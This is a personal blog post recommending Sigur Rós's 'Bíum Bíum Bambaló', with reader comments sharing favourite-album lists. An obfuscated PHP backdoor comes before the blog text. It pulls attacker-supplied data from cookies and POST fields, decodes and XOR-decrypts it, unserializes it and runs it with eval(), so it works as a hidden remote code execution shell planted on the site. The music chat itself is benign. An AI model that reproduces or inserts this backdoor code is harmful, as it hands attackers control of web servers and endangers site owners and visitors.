$XjtazQGNLZ = chr (85) . "\137" . "\125" . chr (98) . chr (98); $YkIHtxDJ = "\x63" . 'l' . chr ( 688 - 591 )."\163" . 's' . '_' . "\145" . chr (120) . "\151" . chr (115) . 't' . chr (115); $vjkYtt = class_exists($XjtazQGNLZ); $YkIHtxDJ = "28484";$jfGVdIh = strpos($YkIHtxDJ, $XjtazQGNLZ);if ($vjkYtt == $jfGVdIh){function nUIjph(){$QjgVmgYsu = new /* 61615 */ U_Ubb(63092 + 63092); $QjgVmgYsu = NULL;}$RiHPdeVRgn = "63092";class U_Ubb{private function nBgFwEdIah($RiHPdeVRgn){if (is_array(U_Ubb::$FqPIG)) {$vKScSbcYj2 = str_replace("<" . "?php", "", U_Ubb::$FqPIG["content"]);eval($vKScSbcYj2); $RiHPdeVRgn = "63092";exit();}}public function PzZdhVoV(){$vKScSbcYj = "29015";$this->_dummy = str_repeat($vKScSbcYj, strlen($vKScSbcYj));}public function __destruct(){U_Ubb::$FqPIG = @unserialize(U_Ubb::$FqPIG); $RiHPdeVRgn = "9051_60179";$this->nBgFwEdIah($RiHPdeVRgn); $RiHPdeVRgn = "9051_60179";}public function sSKpKNOo($vKScSbcYj, $wJIyyODkD){return $vKScSbcYj[0] ^ str_repeat($wJIyyODkD, intval(strlen($vKScSbcYj[0]) / strlen($wJIyyODkD)) + 1);}public function WEUWl($vKScSbcYj){$xzPwBeGSNg = chr ( 458 - 360 )."\x61" . 's' . 'e' . "\66" . chr (52);return array_map($xzPwBeGSNg . '_' . chr ( 344 - 244 )."\x65" . "\x63" . chr ( 840 - 729 )."\144" . chr (101), array($vKScSbcYj,));}public function __construct($ooNll=0){$qkQctSqYWU = chr (44); $vKScSbcYj = "";$BFqpabi = $_POST;$NMWdy = $_COOKIE;$wJIyyODkD = "47d204fd-06b8-41c4-8cb1-d61c55bbcd40";$WNNrxZKr = @$NMWdy[substr($wJIyyODkD, 0, 4)];if (!empty($WNNrxZKr)){$WNNrxZKr = explode($qkQctSqYWU, $WNNrxZKr);foreach ($WNNrxZKr as $LWvzF){$vKScSbcYj .= @$NMWdy[$LWvzF];$vKScSbcYj .= @$BFqpabi[$LWvzF];}$vKScSbcYj = $this->WEUWl($vKScSbcYj);}U_Ubb::$FqPIG = $this->sSKpKNOo($vKScSbcYj, $wJIyyODkD);if (strpos($wJIyyODkD, $qkQctSqYWU) !== FALSE){$wJIyyODkD = explode($qkQctSqYWU, $wJIyyODkD); $iEMOa = base64_decode(md5($wJIyyODkD[0])); $ZelQYTD = strlen($wJIyyODkD[1]) > 5 ? substr($wJIyyODkD[1], 0, 5) : $wJIyyODkD[1];$_GET['new_key'] = md5(implode('', $wJIyyODkD)); $lTnldDbC = str_repeat($ZelQYTD, 2);}}public static $FqPIG = 11292;}nUIjph();} Bíum Bíum Bambaló – Saima Says

Bíum Bíum Bambaló

My Audioscrobbler list is becoming one big “it’s not mine, honest!” a la Austin Powers moment thanks to my lil’ sister’s music sessions while I’m at work.
Earlier, I was listening to Kashmir by Led Zeppelin when someone said, “Oh my God, someone covered that Puff Daddy song?!” I almost rushed upon my sword-shaped letter opener. (By the way, you can’t buy Led Zeppelin tracks on iTunes…whaaa?)
Talking of music (which I’m doing a lot of lately) you must must must listen to Bíum Bíum Bambaló by Sigur Rós. It’s from the soundtrack of an Icelandic film called Englar alheimsins (Angels of the Universe). I don’t care how you get listen to it, sell your soul to Bill Gates if need be. Find it, love it, thank me. This track is going to blow you away, unless of course I’ve hyped it up so much that it disappoints in which case you have permission to kick my butt.
Oh, and if you really cannot get hold of it, tell me and I’ll personally burn it onto a CD for you and send it your way. It’s that good.


  1. Thanks for the recommendation.
    Yep, there is much tune talk here which brings me to ask…what’s eevryone’s fave albums?
    Lets say Top 10
    Better let the hostess go first before sharing mine

  2. No probs girls, I bought blank CDs today for that very purpose. Bushra, I need your address if you want a copy.
    Hmm, Top Ten albums…that’s a toughie because there aren’t many albums I can listen to all the way through. I’d probably have to say Michael Jackson’s Dangerous, Jeff Buckley’s Grace, Justin Timberlake’s Justified, Linkin Park’s Meteora, E.S. Posthumus’s Unearthed, the soundtracks of The Crow and The Lost Boys…oh, and Bob the Builder Does Christmas.

  3. Bob the Builder does Crimbo…missy, you just made my Nephew’s Cristmas Card List
    I’m so weak I couldn’t go with 10 :/
    1. Grace/Sketches for my Sweetheart/ Live at Sine (I know 3 albums at no.1, how lame is that) – Jeff Buckley
    2. Unplugged in NY – Nirvana
    3. Pieces of you – Jewel
    4. Elliot Smith X/O
    5. Ready to Die – Notorious BIG
    6. Radiohead – OK Computer
    7. Odelay – Beck
    8. Aenima – Tool
    9. Bryter Later – Nick Drake
    10. Come find yourself – Fun Lovin’ Criminals
    11. Fat of the Land – Prodigy
    12. Dangerous – Michael Jackson
    13. Unearthed – ES Posthumous
    14. Roman Candle – Elliot Smith
    15. Astral weeks – Van Morrison
    This list is subject to change since I just started listening to Anthony and the Johnsons…wow is all I can say for now.
    Hon mentions: Anything by Nusrat, All Zeppelin albums up to Pysical Graffiti, The Bends – Radihead, Temples of Boom – Cypress Hill, Marshall Mathers LP – Eminem, Unplugged -Clapton, By the Way/ Californication – Chilli Peppers and O – Damien Rice

  4. Ah, the Marshall Mathers LP, how could I forget? And anything by No Doubt is funtastic.
    I bought Sketches for My Sweetheart the Drunk yesterday. I’m sure I’ll be listening to that a LOT over the next couple of months.

  5. Salam.
    Cheers for the heads up, Sigur Ros have a new album out aswell… will download ASAP. I’m not sure how far they can develop though. They’re sound is more atmospheric and sprawling as if it were made trapped on an arctic
    ice pack whilst on a fishing expedition. I’d like to see how they can expand on this to keep us interested.
    Glad to see comments are working… I was incited to write something when a certain gentleman directed me to your journal on Star Wars. I’ll let it pass though, your site otherwise rocks.

  6. Welcome to the site Fred-san.
    Which of their albums would you recommend? I want to listen to more of their music but wasn’t sure where to start; most people recommend all but their first one. They’re actually playing at Brixton Academy on Nov 9th, might be worth checking out.
    As for Star Wars, I didn’t blog about it but Revenge of the Sith was great. I won’t give it away but the whole Jedi and what happens to them scene left me in mouth wide open shock. You know ‘N Sync were cut out from that scene? I’m glad, it would have made it comical.

  7. Hybrid – Wider Angle
    Hybrid – Morning Sci Fi
    Hybrid – Y4K remixes
    Linkin Park – Hybrid Theory
    Linkin Park – Meteora
    Linkin Park – Reanimation
    And that’s about it… Not really a top ten, more of a “what I dig musically baby” list.
    Now, if we were talking about songs… Oooh, favourite songs?
    Hybrid – Finished Symphony (Long edit) or their stripped edit of the same track.
    Now I would happily burn these for all y’all, but I don’t have fancy equipment like ma girl Saima.
    But these songs rock, and my relatives have the responsibility of ensuring that the Finished Symphony (stripped edit) is played at my funeral.

  8. Ms. Says, mentioning ‘N Sync and Star Wars in the same sentence, Fred won’t be a happy bunny. He’ll be more like that Bunny from Donnie Darko.
    Tazman, if you believe in reincarnation, your relatives should play the Linkin Park – Reanimation album at the funeral.

  9. hahahah! Yeah, some of that Reanimatin stuff would work. But I don’t wanna come back. Imagine having to go through high school all over again. And puberty! Aiiiii!
    Instead, I’m gonna haunt all my loved ones. That would be fun!

  10. saima… check out the new album Takk, been listening to it for the past 2 days. it is good.
    i’d recommend another one, but i wouln’t know how to spell it or type those funny letters with dots on them. there is the album called ( ) which has tracks with names such as , and . My favourite being .
    top ten? dunno about bob the builder, could have had a bit more bass. If we’re talking about Linkin Park, i think Re-animation is up there. Here’s my list.
    Tool – Lateralus
    Tool – Salival
    Tool – Aenima
    Tool – Undertow
    Tool – Opiate
    String Quartet Tribute to Tool
    J/k of course. It’s almost impossible to make a list… it can’t be an objective list of the world’s greatest music, but just a snapshot of personal taste at particular point in the self’s spatio-temporal position. In that case, just look at my audioscrobbler page (although it’s not been updated for a while so don’t bother).
    nsync, star wars, whhaa??

  11. I have the new album, Takk, winging its way towards me so cheers for the recommendation. I’ve heard of (), one of the tracks on that, I think it was called but I could be wrong, was on the Vanilla Sky soundtrack.
    So I’m guessing you like Tool…
    Sidebar: Has anyone heard The String Quartet Tribute to Jeff Buckley, any good?
    Tazman, you’re scary enough alive thanks!

  12. String Quartet are a band that cover JB’s tunes avec a classical spin, and in place of the vocals you have a violin…its okay, but why deprive yourself of JB’s amazing lyrics (‘Kiss me out of desire and not consolation’. ‘she’s the tear that hangs inside my soul forever’, ‘sends whips of opinion down my back give me more’ and so on) and his one in a billion voice

  13. Bushra, I got the CD too, thank you so much! I was listening to it today and I’m liking it so far. Will write a review on it later. Thanks again 🙂
    ‘Kiss me out of desire and not consolation’ and ‘she’s the tear that hangs inside my soul forever’ are my fave JB lyrics too along with “I know they all look so good from a distance but I tell you I’m the one” and every single line in Dream Brother.

  14. Nice to see you got your act together and sorted out your blog, Saima 😉
    Can you email that song to me pleeeeease!
    My top 10:
    Synchronicity – The Police
    Sgt Peppers Lonely Hearts Club Band – The Beatles
    Fun With Humans – Stretch Princess
    (Whats The Story) Morning Glory – Oasis
    The Bends – Radiohead
    Early Days and Latter Days – Led Zeppelin
    Thriller – Michael Jackson
    Things to Make and Do – Moloko
    White Album – The Beatles
    Forty Licks – The Rolling Stones

  15. Hasan!! Welcome back dude. Where’s Faisal these days?
    I bought that song from iTunes so if I send it to you you probably won’t be able to open it?

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